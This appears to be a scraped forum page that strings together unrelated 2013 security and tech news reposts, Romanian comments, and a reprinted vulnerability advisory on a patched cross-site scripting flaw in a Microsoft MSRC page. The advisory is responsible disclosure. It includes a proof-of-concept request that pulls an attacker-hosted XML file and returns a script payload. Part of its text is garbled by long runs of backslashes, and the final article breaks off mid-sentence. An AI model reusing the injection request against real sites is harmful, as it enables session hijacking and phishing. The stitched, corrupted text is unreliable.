Matt

Probabil ati vazut prea multe filme cu rusi.Inca nu v-ati dat seama ca America are puterea.O sa va dati seama in curand..

Given the recent revelations about mass data slurping by the NSA, we were relieved to hear that a Chinese company has begun offering a whopping 10TB of free hosting to privacy-conscious punters. After Chinese rivals Baidu and Qihoo 360 served up a terabyte of free cloud storage to punters, rival Tencent this week floated a 10TB giveaway, reports TheNextWeb. The data bonanza requires users download an iOS or Android App, which gives them access to a terabyte of storage. As they use more data, Tencent will extend the amount of storage given away up to a whopping 10 terabytes. This compares with a piddling 15GB freebie giveaway for Google Drive, up to 18GB for Dropbox, and 7GB for Microsoft's SkyDrive. So, with that much storage, what could you actually keep in the Chinese cloud? Enter El Reg's patent-pending Ballmer scale. This 378X250 pixel image of departing Microsoft exec Steve Ballmer takes up 23,269 bytes. Under Tencent's giveaway, you could spam 472,522,080 copies of this image up into the cloud. Why stick with just one image? Steve Ballmer is 57, which adds up to some 29 million minutes, or 1,798,743,600 seconds, so if we had trained a camera on Ballmer from birth we could use Tencent to store one image for every four seconds of the venerable CEO's life to date. But what if we wanted to save not just Ballmer's likeness, but his essence? The human genome can feasibly be stored in as little as 1.5GB of data. Given that the person-to-person DNA variance is about 0.1 percent, then, the unique Steve Ballmer can be represented by around 1.53600 megabytes. Therefore, the Tencent cloud could store an impressive 6,708, 739 copies of Ballmer's DNA profile. For the culture vultures among us, you could also store around half of the Library of Congress – but why would you want to do that when you could stuff Tencent with a virtual army of Steve Ballmers? ® Source TheRegister.Co.Uk

Description : Microsoft Online Services suffered from a cross site scripting vulnerability. Note that this finding houses site-specific data. Author : Mohd. Shadab Siddiqui Source : Microsoft MSRC RSS ASPX Cross Site Scripting ? Packet Storm Code : Title: ====== Microsoft MSRC RSS ASPX - CS Cross Site Web Vulnerability Date: ===== 2013-07-28 References: =========== http://www.vulnerability-lab.com/get_content.php?id=1026 Microsoft Security Response Center (MSRC) ID: 15180 Video: http://www.vulnerability-lab.com/get_content.php?id=1028 View: http://www.youtube.com/watch?v=wcIIFB4Gx7g VL-ID: ===== 1026 Common Vulnerability Scoring System: ==================================== 1.6 Introduction: ============= Microsoft Online Services is Microsoft`s hosted-software offering and a component of their software plus services strategy. Microsoft Online Services are hosted by Microsoft and sold `with` Microsoft partners. The suite includes Exchange Online, SharePoint Online, Office Communications Online, Microsoft Forefront, and Microsoft Office Live Meeting. For businesses, the Software-plus-Services approach enables organizations to access the capabilities of enterprise software through on-premises servers, as online services, or a combination of both, depending on specific business requirements. Services also provide the option to add complementary capabilities that enhance on-premises server software and simplify system management and maintenance. (Copy of the vendor Homepage: https://microsoftonline.com ) Abstract: ========= An independent vulnerability laboratory researcher discovered a client-side cross site scripting vulnerability on Microsoft Website Application. Report-Timeline: ================ 2013-07-18: Researcher Notification & Coordination (Muhammad A.S.) 2013-07-19: Vendor Notification (Microsoft Security Response Center - MSRC) 2013-07-20: Vendor Response/Feedback (Microsoft Security Response Center - MSRC) 2013-07-26: Vendor Fix/Patch (Microsoft Development Team) 2013-07-28: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Microsoft Corporation Product: Security Response Center (MSRC) - Blog aspx Web Application 2013 Q2 Exploitation-Technique: ======================= Remote Severity: ========= Low Details: ======== It has been discovered that the file `ssfeedgenerator.aspx` is not validating the input parameters and hence is vulnerable to remote xss attacks. Since no validation is being performed, it is possible to include remote xml files to be parsed and displayed on the main microsoft website. A remote attacker can include malicious xml files via URLS variable which can lead to remote java-script execution on the client machine within the context of microsoft.com website. The vulnerability is located in the rssfeedgenerator.aspx\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\" file and the vulnerable parameter is \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'URLs\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' which can be exploited via GET method to include remote (external) xml files. Exploitation of the vulnerability requires no privilege application user account but low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, non persistent phishing, non persistent malware injects, external redirects and manipulation of affected module or application context. Vulnerable Module(s): [+] RSS Feeds Vulnerable Path: [+] /security/msrc/rssfeedgenerator.aspx Vulnerable File(s): [+] rssfeedgenerator.aspx Vulnerable Parameter(s): [+] URLs Proof of Concept: ================= The client side web vulnerability can be exploited by remote attackers without privilege application user account and with low user interaction. For demonstration or reproduce ... GET /security/msrc/rssfeedgenerator.aspx?URLs=http://www.nybbletech.com/poc/ms/micro.xml&itemToDisplay=3&words=16 HTTP/1.1 Host: www.microsoft.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Cookie: v1st=58D7FEA59B237B40; MC1=GUID=376046a1d44f8b42834ba1809be0406d&HASH=a146&LV=20136 &V=4&LU=1371688854677; A=I&I=AxUFAAAAAACVBwAA4cYlXvROT/4qjCG/tr9eRg!!&V=4; WT_FPC=id=3513600256.30305614:lv=1373527230788:ss=1373527206515 Connection: keep-alive Response: INT NAV ONL PHY PRE PUR UNI" X-AspNet-Version: 2.0.50727 VTag: 279923242400000000 X-Powered-By: ASP.NET X-Powered-By: ARR/2.5 X-Powered-By: ASP.NET Date: Fri, 19 Jul 2013 14:44:14 GMT Content-Length: 1847 <div id="rssData1"><div><table width="100%" cellspacing="0" cellpadding="0" border="0" > <tr><td><a href="http://blogs.technet.com/b/srd/archive/2013/07/10/running-in-the-wild-not-for-so-long.aspx" target="_blank"> <b>Running in the wild, not for so long</b></a></td></tr><tr><td style="padding-bottom:2px;"><font size="1"> <i>Security Research & Defense - Wednesday, July 10, 2013 5:12:00 PM</i></font></td></tr><tr><td style="padding-bottom:10px;"> Over <a href="javascript:alert('VULNERABLE')">CLICK HERE</a>testinging we received a report from our partners about a possible unpatched Internet Explorer vulnerability ......</td></tr></table></div><div><table width="100%" cellspacing="0" cellpadding="0" border="0" ><tr><td><a href="http://blogs.technet.com/b/srd/archive/2013/07/09/assessing-risk-for-the-july-2013-security-updates.aspx" target="_blank"><b>Assessing risk for the July 2013 security updates</b></a></td></tr><tr><td style="padding-bottom:2px;"><font size="1"> <i>Security Research & Defense - Tuesday, July 9, 2013 10:09:00 AM</i></font></td></tr><tr><td style="padding-bottom:10px;">Today we released seven security bulletins addressing 34 CVE’s. Six bulletins have a maximum severity rating of Critical, ...... </td></tr></table></div><div><table width="100%" cellspacing="0" cellpadding="0" border="0" ><tr><td> <a href="http://blogs.technet.com/b/srd/archive/2013/06/17/emet-4-0-now-available-for-download.aspx" target="_blank"> <b>EMET 4.0 now available for download</b></a></td></tr><tr><td style="padding-bottom:2px;"><font size="1"><i>Security Research & Defense - Monday, June 17, 2013 10:01:00 AM</i></font></td></tr><tr><td style="padding-bottom:10px;">We are pleased to announce that <strong>the final release of version 4.0 of the Enhanced Mitigation Experience Toolkit</strong>, ......</td></tr></table></div></div> Solution: ========= Input data via URLS parameter should be validated. Only white-listed domains should be allowed for redirects and direct links. Risk: ===== The security risk of the client side cross site scripting vulnerability in the microsoft security web application is estimated as low(+)|(-)medium. Credits: ======== Muhammad Ahmed Siddiqui - ahmed@nybbletech.com Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com

SDN (software-defined networking) promises some real benefits for people who use networks, but to the engineers who manage them, it may represent the end of an era. Ever since Cisco made its first routers in the 1980s, most network engineers have relied on a CLI (command-line interface) to configure, manage and troubleshoot everything from small-office LANs to wide-area carrier networks. Cisco's isn't the only CLI, but on the strength of the company's domination of networking, it has become a de facto standard in the industry, closely emulated by other vendors. As such, it's been a ticket to career advancement for countless network experts, especially those certified as CCNAs (Cisco Certified Network Associates). Those network management experts, along with higher level CCIEs (Cisco Certified Internetwork Experts) and holders of other official Cisco credentials, make up a trained workforce of more than 2 million, according to the company. A CLI is simply a way to interact with software by typing in lines of commands, as PC users did in the days of DOS. With the Cisco CLI and those that followed in its footsteps, engineers typically set up and manage networks by issuing commands to individual pieces of gear, such as routers and switches. SDN, and the broader trend of network automation, uses a higher layer of software to control networks in a more abstract way. Whether through OpenFlow, Cisco's ONE (Open Network Environment) architecture, or other frameworks, the new systems separate the so-called control plane of the network from the forwarding plane, which is made up of the equipment that pushes packets. Engineers managing the network interact with applications, not ports. "The network used to be programmed through what we call CLIs, or command-line interfaces. We're now changing that to create programmatic interfaces," Cisco Chief Strategy Officer Padmasree Warrior said at a press event earlier this year. Will SDN spell doom for the tool that network engineers have used throughout their careers? "If done properly, yes, it should kill the CLI. Which scares the living daylights out of the vast majority of CCIEs," Gartner analyst Joe Skorupa said. "Certainly all of those who define their worth in their job as around the fact that they understand the most obscure Cisco CLI commands for configuring some corner-case BGP4 (Border Gateway Protocol 4) parameter." At some of the enterprises that Gartner talks to, the backlash from some network engineers has already begun, according to Skorupa. "We're already seeing that group of CCIEs doing everything they can to try and prevent SDN from being deployed in their companies," Skorupa said. Some companies have deliberately left such employees out of their evaluations of SDN, he said. Not everyone thinks the CLI's days are numbered. SDN doesn't go deep enough to analyze and fix every flaw in a network, said Alan Mimms, a senior architect at F5 Networks. "It's not obsolete by any definition," Mimms said. He compared SDN to driving a car and CLI to getting under the hood and working on it. For example, for any given set of ACLs (access control lists) there are almost always problems for some applications that surface only after the ACLs have been configured and used, he said. A network engineer will still have to use CLI to diagnose and solve those problems. However, SDN will cut into the use of CLI for more routine tasks, Mimms said. Network engineers who know only CLI will end up like manual laborers whose jobs are replaced by automation. It's likely that some network jobs will be eliminated, he said. This isn't the first time an alternative has risen up to challenge the CLI, said Walter Miron, a director of technology strategy at Canadian service provider Telus. There have been graphical user interfaces to manage networks for years, he said, though they haven't always had a warm welcome. "Engineers will always gravitate toward a CLI when it's available," Miron said. Even networking startups need to offer a Cisco CLI so their customers' engineers will know how to manage their products, said Carl Moberg, vice president of technology at Tail-F Systems. Since 2005, Tail-F has been one of the companies going up against the prevailing order. It started by introducing ConfD, a graphical tool for configuring network devices, which Cisco and other major vendors included with their gear, according to Moberg. Later the company added NCS (Network Control System), a software platform for managing the network as a whole. To maintain interoperability, NCS has interfaces to Cisco's CLI and other vendors' management systems. CLIs have their roots in the very foundations of the Internet, according to Moberg. The approach of the Internet Engineering Task Force, which oversees IP (Internet Protocol) has always been to find pragmatic solutions to defined problems, he said. This detailed-oriented "bottom up" orientation was different from the way cellular networks were designed. The 3GPP, which developed the GSM standard used by most cell carriers, crafted its entire architecture at once, he said. The IETF's approach lent itself to manual, device-by-device administration, Moberg said. But as networks got more complex, that technique ran into limitations. Changes to networks are now more frequent and complex, so there's more room for human error and the cost of mistakes is higher, he said. "Even the most hardcore Cisco engineers are sick and tired of typing the same commands over and over again and failing every 50th time," Moberg said. Though the CLI will live on, it will become a specialist tool for debugging in extreme situations, he said. "There'll always be some level of CLI," said Bill Hanna, vice president of technical services at University of Pittsburgh Medical Center. At the launch earlier this year of Nuage Networks' SDN system, called Virtualized Services Platform, Hanna said he hoped SDN would replace the CLI. The number of lines of code involved in a system like VSP is "scary," he said. On a network fabric with 100,000 ports, it would take all day just to scroll through a list of the ports, said Vijay Gill, a general manager at Microsoft, on a panel discussion at the GigaOm Structure conference earlier this year. "The scale of systems is becoming so large that you can't actually do anything by hand," Gill said. Instead, administrators now have to operate on software code that then expands out to give commands to those ports, he said. Faced with these changes, most network administrators will fall into three groups, Gartner's Skorupa said. The first group will "get it" and welcome not having to troubleshoot routers in the middle of the night. They would rather work with other IT and business managers to address broader enterprise issues, Skorupa said. The second group won't be ready at first but will advance their skills and eventually find a place in the new landscape. The third group will never get it, Skorupa said. They'll face the same fate as telecommunications administrators who relied for their jobs on knowing obscure commands on TDM (time-division multiplexing) phone systems, he said. Those engineers got cut out when circuit-switched voice shifted over to VoIP (voice over Internet Protocol) and went onto the LAN. "All of that knowledge that you had amassed over decades of employment got written to zero," Skorupa said. For IP network engineers who resist change, there will be a cruel irony: "SDN will do to them what they did to the guys who managed the old TDM voice systems." But SDN won't spell job losses, at least not for those CLI jockeys who are willing to broaden their horizons, said analyst Zeus Kerravala of ZK Research. "The role of the network engineer, I don't think, has ever been more important," Kerravala said. "Cloud computing and mobile computing are network-centric compute models." Data centers may require just as many people, but with virtualization, the sharply defined roles of network, server and storage engineer are blurring, he said. Each will have to understand the increasingly interdependent parts. The first step in keeping ahead of the curve, observers say, may be to learn programming. "The people who used to use CLI will have to learn scripting and maybe higher-level languages to program the network, or at least to optimize the network," said Pascale Vicat-Blanc, founder and CEO of application-defined networking startup Lyatiss, during the Structure panel. Microsoft's Gill suggested network engineers learn languages such as Python, C# and PowerShell. For Facebook, which takes a more hands-on approach to its infrastructure than do most enterprises, that future is now. "If you look at the Facebook network engineering team, pretty much everybody's writing code as well," said Najam Ahmad, Facebook's director of technical operations for infrastructure. Network engineers historically have used CLIs because that's all they were given, Ahmad said. "I think we're underestimating their ability. " Cisco is now gearing up to help its certified workforce meet the newly emerging requirements, said Tejas Vashi, director of product management for Learning@Cisco, which oversees education, testing and certification of Cisco engineers. With software automation, the CLI won't go away, but many network functions will be carried out through applications rather than manual configuration, Vashi said. As a result, network designers, network engineers and support engineers all will see their jobs change, and there will be a new role added to the mix, he said. In the new world, network designers will determine network requirements and how to fulfill them, then use that knowledge to define the specifications for network applications. Writing those applications will fall to a new type of network staffer, which Learning@Cisco calls the software automation developer. These developers will have background knowledge about networking along with skills in common programming languages such as Java, Python, and C, said product manager Antonella Como. After the software is written, network engineers and support engineers will install and troubleshoot it. "All these people need to somewhat evolve their skills," Vashi said. Cisco plans to introduce a new certification involving software automation, but it hasn't announced when. Despite the changes brewing in networks and jobs, the larger lessons of all those years typing in commands will still pay off for those who can evolve beyond the CLI, Vashi and others said. "You've got to understand the fundamentals," Vashi said. "If you don't know how the network infrastructure works, you could have all the background in software automation, and you don't know what you're doing on the network side." Stephen Lawson covers mobile, storage and networking technologies for The IDG News Service. Follow Stephen on Twitter at @sdlawsonmedia. Stephen's e-mail address is stephen_lawson@idg.com Source ComputerWorld.Com

The number of active connections to the anonymous Tor web tool doubled to 1.2 million in August. The figure was revealed on the Tor Metrics Portal, which showed a marked spike in the number of Tor connections, which usually averages around 550,000. Tor's Roger Dingledine has issued a statement confirming the figure, adding that the reason for the increase remains unknown. "The number of Tor clients running appears to have doubled since August 19 and it's not just a fluke in the metrics data – it appears that there really are twice as many Tor clients running as before," he wrote. "There's a slight increase (worsening) in the performance measurements, but it's hard to say if that's a real difference. So while there are a bunch of new Tor clients running, it would seem they're not doing much. Anybody know details? It's easy to speculate (Pirate Browser publicity gone overboard? People finally reading about the NSA thing? Botnet?) But some good solid facts would sure be useful." Members of the Tor community have since mirrored Dingledine's surprise. One Tor community member posting under the name Mick suggested that the increase could be due to the recently launched PirateBay's PirateBrowser. "I suspect PirateBrowser, given that PirateBay users probably outnumber privacy lovers by two-to-three orders of magnitude," he wrote. The PirateBrowser was launched by the PirateBay in August and is designed to let users get around internet service providers' (ISPs) online blockades. The browser is a preconfigured bundle for the Firefox Tor client (Vidalia), though it doesn't offer the same web anonymity as the regular Tor Browser. Others, like community member Grarpamp, have been more suspicious, arguing that it is the result of a botnet or explorative cyber attack. "Too big a double in under a week for me to believe it's natural growth based on news or some promo somewhere. I'd guess it got included in some app. A botnet fits perfect. Or it's some sort of analysis, attack or flood," wrote Grarpamp. Tor is a free service designed to let people surf the internet anonymously by directing internet traffic through a volunteer network of more than 3,000 relays to conceal the user's location. The process was previously believed to make web users untrackable, however earlier in August reports broke claiming the FBI has found a way to track people using the Tor Browser. Since the reports broke an exploit pertaining to be the one used by the FBI has appeared on the Metasploit penetration testing forum. Source V3.CO.UK

Security expert Bruce Schneier has attacked the NSA over its treatment of former anonymous email service provider Lavabit, claiming the agency has "commandeered the internet". Schneier attacked the NSA for its behaviour in a public blog post, arguing that it is using laws to forcibly turn tech companies into mass surveillance tools. "If there's any confirmation that the US government has commandeered the internet for worldwide surveillance, it is what happened with Lavabit earlier this month," he wrote. The renowned cryptographer said the NSA's treatment of Lavabit's founder Ladar Levison after he chose to shut down the service in a bid to protect his customers from the agency, is proof it is going too far in its efforts to monitor the internet. "So far, we just have an extreme moral act in the face of government pressure. It's what happened next that is the most chilling. The government threatened him with arrest, arguing that shutting down this email service was a violation of the order," he wrote. Schneier said the threat of arrest shows the US government's behaviour proves it believes it has sovereignty over private industry. "There it is. If you run a business, and the FBI or NSA want to turn it into a mass surveillance tool, they believe they can do so, solely on their own initiative. They can force you to modify your system. They can do it all in secret and then force your business to keep that secret. Once they do that, you no longer control that part of your business," he wrote. "You can't shut it down. You can't terminate part of your service. In a very real sense, it is not your business anymore. It is an arm of the vast US surveillance apparatus, and if your interest conflicts with theirs then they win. Your business has been commandeered." He added that while it is unclear if law enforcement would actually be able to make good on its threats to arrest non-compliant businesses, the very fact the NSA made the threat proves the need for legislative change. "Protection rackets are easier when you have the law backing you up. As the Snowden whistleblowing documents continue to be made public, we're getting further glimpses into the surveillance state that has been secretly growing around us," he wrote. "The collusion of corporate and government surveillance interests is a big part of this, but so is the government's resorting to intimidation. Every Lavabit-like service that shuts down – and there have been several – gives us consumers less choice, and pushes us into the large services that co-operate with the NSA. It's past time we demanded that Congress repeal National Security Letters, give us privacy rights in this new information age, and force meaningful oversight on this rogue agency." Schneier is one of many members of the security community to call for change following the PRISM revelation and Lavabit shutdown. Silent Circle chief executive Mike Janke made a similar claim after shutting down the company's own secure email service. Source V3.CO.UK

Felicitari pentru tool-ul realizat.Daca ar face fiecare VIP cate un tool de asemenea "calibru" ...

Cercetatorii in domeniul securitatii au publicat o lucrare de cercetare prin care explica modalitatea in care au ocolit functiile de securitate ale serviciului de stocare cloud-based Dropbox si au obtinut acces la fisierele private ale utilizatorilor. Dhiru Kholia din cadrul Openwall si Przemyslaw Wegrzyn din cadrul CodePainters au declarat ca, desi serviciul are peste 100 milioane de utilizatori, platforma nu a mai fost analizata, pana acum, in mod extensiv, din punct de vedere al securitatii. Acestia au explicat ca obiectivul lor este acela de a determina Dropbox sa creeze o versiune open source, ceea ce ar insemna ca oricine ar putea analiza codul si ar putea verifica daca serviciul este sigur. Cercetatorii au relevat ca au reusit sa obtina acces neautorizat la fisiere, in ciuda faptlui ca Dropbox a adaugat functii de securitate dupa ce a fost atacat, cu un an in urma. Masurile de securitate vizand atragerea utilizatorilor enterprise includeau criptare si autentificare two-factor, insa ambele au fost ocolite de catre Kholia si Wegrzyn. Acestia au reusit sa inverseze portiunea Dropbox care ruleaza pe computerul utilizatorului, in ciuda faptului ca Dropbox a fost scris in Python, folosindu-se tehnici de prevenire a ingineriei inverse. Acest lucru inseamna ca multe alte servicii cloud care utilizeaza Python si aceleasi tehnici anti-hacking ar putea fi supusi riscului, a informat Business Insider. Cercetatorii au descoperit faptul ca autentificarea two-factor, cum este cea folosita de catre Dropbox, protejeaza doar impotriva accesului neautorizat pe site-ul Dropbox. "API-ul internal client al Dropbox nu suporta si nu utilizeaza autentificarea two-factor. Acest lucru presupune faptul ca este suficient a detine doar valoarea host_id pentru a obtine acces asupra datelor vizate, stocate in Dropbox", au explicat cercetatorii. Cu toate acestea, Dropbox a declarat ca nu crede ca cercetarea prezinta o vulnerabilitate in Dropbox client. "In cazul prezentat in cercetare, computerul utilizatorului ar trebui mai intai sa fie compromis intr-un mod care ar afecta intregul computer, nu doar Dropbox-ul utilizatorului", a opinat compania. Kholia si Wegrzyn spera ca vor fi ajutati sa construiasca o metoda mai sigura, open source, pentru utilizarea Dropbox, care va putea fi adoptata de catre Dropbox. Source : ComputerWeekly.com | Information Technology (IT) News, UK IT Jobs, Industry News

Following through on an order earlier this year from President Obama, the National Institute of Standards and Technology (NIST) is rapidly developing a set of guidelines and best practices to help organizations better secure their IT systems. The agency released a draft of its preliminary cybersecurity framework and is seeking feedback from industry. The agency is scheduled to release a full preliminary draft in October, for public review. It will then issue the final 1.0 version of the framework in February and continue to update the framework thereafter. When finished, the framework will provide guidance for organizations on how to manage cybersecurity risk, "in a manner similar to financial, safety, and operational risk," the document states. In February the White House issued an executive order tasking NIST to develop a cybersecurity framework, one based on existing standards, practices and procedures that have proven to be effective. In July, NIST issued an outline of the framework and held a workshop in San Diego to fill in some details. This draft incorporates some of that work, and was released to gather more feedback ahead of the next workshop, to be held in Dallas starting on Sept. 11. "The Framework complements, and does not replace, an organization's existing business or cybersecurity risk management process and cybersecurity program. Rather, the organization can use its current processes and leverage the framework to identify opportunities to improve an organization's cybersecurity risk management," the draft read. When finished, the framework will consist of three parts. One component, called the core functions, will be a compilation of commonly practiced activities and references. The second component, the implementation tiers, provides guidance on how to manage cybersecurity risks. The third component, the framework profile, provides guidance on how to integrate the core functions within a cybersecurity risk strategy, or plan. On Twitter, framework ideas are being submitted and discussed with the hashtag #NISTCSF. Joab Jackson covers enterprise software and general technology breaking news for The IDG News Service. Follow Joab on Twitter at @Joab_Jackson. Joab's e-mail address is Joab_Jackson@idg.com Source ComputerWorld.Com

The developers of the popular vBulletin commercial Internet forum software are investigating a potential exploit and advised users to delete the "install" directory from their deployments as a precaution. "A potential exploit vector has been found in the vBulletin 4.1+ and 5+ installation directories," Wayne Luke, technical support lead at vBulletin Solutions, the company that develops the software, announced this week on the vBulletin community forum. "Our developers are investigating this issue at this time. If deemed necessary we will release the necessary patches." Luke advised users to delete the 'install' directory from their vBulletin installations in order to mitigate the issue that hasn't yet been disclosed. The directory that should be deleted is "/install" for vBulletin 4.1.x versions and "/core/install" for the 5.x versions. This directory normally contains the scripts and files used during the original installation process and subsequent upgrades. In the "Cleaning up after Install" section of the vBulletin manual users are advised to delete all files and subdirectories from the "install" directory as a security precaution. However, they are not advised to delete the directory itself. It's not clear what the exploit currently being investigated would allow potential attackers to do, but the fact that it prompted an advance warning from the developers suggests that it might have serious implications. Luke declined to disclose information about the nature of the exploit. "I am sorry but in the interest of security for our customers, we can not discuss this issue at this time," he said Thursday via email. "Going back to our logs, we dont see any specific scans for /core/install, but we see constant discovery requests for /install," said Daniel Cid, chief security officer at Sucuri, a company that provides website security monitoring and malware clean-up services, in a blog post. "We dont yet know if that is related to vBulletin or other CMSs [content management systems]." Attackers are constantly trying to exploit vulnerabilities in popular content management systems in order to break into websites, and while vBulletin does not power as many websites as WordPress, Joomla or some other general-purpose CMS software, it is one of the most popular applications for setting up Internet discussion forums. According to vBulletin Solutions, over 100,000 community websites are running on vBulletin, including some operated by Zynga, Electronic Arts, Sony Pictures, NASA, Valve Corporation and other well known companies. In July, hackers broke into UbuntuForums.org, a community website for the Ubuntu Linux distribution with over 1.8 million registered accounts, and managed to access information about users, including email addresses and password hashes. The site was using vBulletin. "In summary, the root cause was a combination of a compromised individual account and the configuration settings in vBulletin, the Forums application software," Canonical, the company that operates the site, said in a blog post following the incident. Source ComputerWorld.COm

New York, NY – Producers of DRAGON DAY announced that the political and psychological thriller will begin a limited release in theaters November 1. Ex-NSA engineer Duke Evans and his wife and child try to rebuild a new life in a remote mountain town when without notice all power, communications, transportation and banking is shut down. Caught in the middle of an unprecedented cyber-attack, Duke and his family must rely upon a survivalist spirit and raw ingenuity to avoid lawless neighbors and an encroaching dictatorship that demands total loyalty. They cannot run. They cannot hide. How will they make it with food, water, and time running out? The movie explores themes of the NSA, privacy, China, and the exploding national debt. Do we really believe that the national debt will simply go away? What happens when China asks Americans to pay, one way or another? Dragon Day will premiere at the HackerHalted cyber-security event in Atlanta, GA on September 19-21 before a gathering of more than 1500 certified hackers who work to protect individuals, companies, and government from attacks. The movie stars Ethan Flower (Parenthood, Die Hard 4), Osa Wallander, Jenn Gotzon (Doonby, Frost/Nixon), Scoot McNairy (Argo, Killing them Softly, Monsters), Eloy Mendez, William Knight, and Hope Laubach. Directed, written, and produced by award-winning filmmaker Jeffrey Travis, Dragon Day is co-written and produced by Matt Patterson, executive produced by Steve Markham, and produced by Alex Sobol. Kazimir Boyle is the composer. Burning Myth Productions (Los Angeles, CA) and Matter Media Studios (Austin, TX and Los Angeles, CA) developed and funded the projected. Request an interview with director and producers at: 646-410-2030 or susan@differentdrummer.com Source EHackingNews.Com

A pair of Italian security researchers investigating the practice of Facebook scamming estimates that the trade brings in around $200m a year. Andrea Stroppa and Carlo De Micheli analyzed the pricing of Facebook spam on 20 black-market websites offering access to Facebook users for a price. The spammers set up fan sites and encourage people to join them, then pump out spam messages to encourage click-throughs, bringing in between $87m and $390m per year. "The spam posters get paid an average of $13 per post, for pages that have around 30,000 fans, up to an average of $58 to post on pages with more than 100,000 fans," De Micheli told The Guardian. "If we consider these two as extremes, the pages we analysed generate a revenue of 18,000 posts per day, times the revenue per post – ranging from $13 to $58 – 365 days a year. The researchers found that such spam was being used to drive traffic to YouTube videos and e-commerce sites using shortened URLs to disguise the location of the linked-to page. Google also inadvertently benefits – around 9 per cent of the spammer's links make money from redirects to AdSense-funded pages. Spammers seem to have little care as to what they set up spam fan sites for – the team noted one for victims of the Boston terrorist bombing, but said that the spammers they contacted insisted they were doing nothing wrong. "Facebook doesn't ban us, simply because we generate the content on Facebook itself. Everyday I materialize funny, and interesting content full of phrases and so forth that is shared and liked by thousands of users," said one in a Skype conversation. "Without the fan pages Facebook would be an empty place. Tell me how many links do you see shared by your friends on your timeline everyday? You see – the answer is simple." Facebook spam has been around for a while – the researchers found adverts for spamming payments going back to 2010 – but in the last year or so spamming services have matured and grown. Facebook told the paper it was doing what it could. "We have developed a number of automated systems to identify 